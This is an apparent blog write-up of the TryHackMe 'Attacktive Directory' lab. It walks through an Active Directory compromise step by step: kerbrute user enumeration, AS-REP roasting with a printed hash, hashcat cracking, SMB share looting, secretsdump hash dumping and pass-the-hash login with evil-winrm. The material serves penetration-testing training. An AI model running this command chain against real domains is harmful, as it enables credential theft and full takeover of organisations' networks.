TryHackMe – Attacktive Directory

Exploiting a Domain Controller: https://tryhackme.com/room/attacktivedirectory

Setup

# get Impacket
git clone <https://github.com/SecureAuthCorp/impacket.git> /opt/impacket
# install pip for Python3
sudo apt install python3-pip
# install prereqs
pip3 install -r /opt/impacket/requirements.txt
# install impacket
cd /opt/impacket && sudo python3 ./setup.py install

# install bloodhound and neo4j
sudo apt install bloodhound neo4j

Enumeration

nmap -sV -v 10.10.98.191 -A

We discovered many ports, included an SMB share, web server, kerberos and LDAP.

It also mentions a new tool called kerbrute, so I installed this to /opt. We can run the command by calling /opt/kerbrute. We are also provided with a set of usernames and passwords that I saved to ~/thm/attacktive.

# this command runs user enumeration (does not lock accounts)
# --dc tells kerbrute the machines ip (without looking up DNS)
# -d is the domain we discovered from nmap
# userlist.txt is our custom userlist we were supplied

/opt/kerbrute userenum --dc 10.10.98.191 -d spookysec.local  userlist.txt

We find a list of several usernames (james, svc-admin, robin, darkstar, administrator, backup, paradox). The most interesting ones are svc-admin and backup.

Abusing Kerberos

Now that we have some potential accounts, we can attempt to abuse a feature with an attack method called ASRreproasting. This occurs when a user account has the privilege “Does not require Pre-Authentication” set. So the account in question does not need to provide valid identification before requesting a Kerberos Ticket.

Impacket has a tool called GetNpUsers.py (/opt/impacket/examples/GetNPUsers.py) that we can use to query ASReproastable accounts from the Key Distribution Center. We need to supply a valid set of usernames which we have already obtained from Kerbrute.

# run the script, specify the domain name, user and the IP for the machine
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/backup -no-pass -dc-ip 10.10.98.191
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

# test it for svc-admin as well
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.98.191
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:556f8bce5464fd6ab023679ec4782bf6$2bdc8273a91332c6cff989002901adff5c36b4f33abb2ce444a3b491e76b3b240e8c642b665067cb4996549eb1f6b9971a39396efd442b12f8d94151f124d248e394ad3bd8eaf7154bd03c879486b97e09b35dc8c4d7b0ced462eb413576e01d381aa2ea01ae6fa9c2ba250249218a0cb22acd7f0f17685983d2a85add32c5ba4bd5b5f105c65acad6944062a42e595a3bab90ef486d450e357f27de9be188ca34ada6077e1214a251c43fafd64a833c2da925108cea6b81d4293eb05a2ad701fae11a4a5e2ef341eb8ff3b104a101bcda29672ecd3314ff8dbfef37425680546b303a4ed47142fa399f7c3e28786f3353f1

We got a hash back! Looking at the HashCat examples wiki page, this appears to be Kerberos 5 AS-REP etype 23, which is mode 18200. We can save this full hash to a file and then specify the mode, hash and dictionary like so:

hashcat -m 18200 hash.txt passwordlist.txt

And if we look at the end of our hash, we got the password for svc-admin!

Enumeration Pt 2 – With Credentials

Now that we have credentials, we can try to enumerate shares and use the credentials to get more details back

We can run smbclient to get a list of shares:

smbclient -L 10.10.98.191 -U svc-admin
Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Next I started going down the list with svc-admin‘s credentials, we have access to the backup share, which we can access like so:

smbclient \\\\10.10.98.191\\backup -U svc-admin

And after running ls, we see a backup_credentials.txt file on the share. We cannot print the file, so we will have to see if we can grab it:

smbget -R smb://10.10.98.191/backup/ -U svc-admin                                            1 ⨯
Password for [svc-admin] connecting to //backup/10.10.98.191: 
Using workgroup WORKGROUP, user svc-admin
smb://10.10.98.191/backup//backup_credentials.txt                                                    
Downloaded 48b in 7 seconds

Now we can cat backup_credentials.txt, and we get a base64 encoded string. We can decode and we get the credentials for backup!

Elevating Privileges

With our new credentials, we could have elevated access. This backup account could be the backup for the entire Domain Controller that would allow all AD changes to be synced to this account, including password hashes. We can use a different impacket tool called secretsdump.py to retrieve all the password hashes we could have access to:

python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.98.191 -target-ip 10.10.98.191  backup@spookysec.local

And now we have a bunch of hashes! We can use an attack called Pass the Hash to login using the administrator’s hash. There is a tool called Evil-WinRM that will allow us to use the hash., we just need to install it with sudo gem install evil-winrm, and now we can run this command to gain access:

evil-winrm -i 10.10.98.191 -u Administrator -H <hash>

And we are in! Now we can browse the file system, but as Admin, we could do pretty much whatever at this point.

Machine Compendium

This is my own personal way of keeping track of all the information we have discovered:

{
	"MACHINE_IP": "10.10.98.191",
	"MACHINE_INFO" : {
		"os": "Windows",
		"host": "ATTACTIVEDIREC",
		"netbios_domain": "THM-AD",
		"dns_domain": "spookysec.local",
		"ntlm_prod_ver":"10.0.17763"
	},
	"OPEN_PORTS": {
		"53": ["domain", "Simple DNS Plus"],
		"80": ["http", "Microsoft IIS httpd 10.0"],
		"88": ["kerberos-sec", "Microsoft Windows Kerberos"],
		"135": ["msrpc", "Microsoft Windows RPC"],
		"139": ["netbios-ssn", "Microsoft Windows netbios-ssn"],
		"389": ["ldap", "Microsoft Windows Active Directory LDAP"],
		"445": "microsoft-ds?",
		"464": "kpasswd5?",
		"593": ["ncacn_http", "Microsoft Windows RPC over HTTP 1.0"],
		"636": "tcpwrapped",
		"3268": ["ldap", "Microsoft Windows Active Directory LDAP"],
		"3269": "tcpwrapped",
		"3389": ["ms-wbt-server", "Microsoft Terminal Services"]
	},
	"CREDENTIALS":"redacted-for-writeup",
	"OTHER_INFO": {
		"vulnerabilities": []
	}
	
}

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *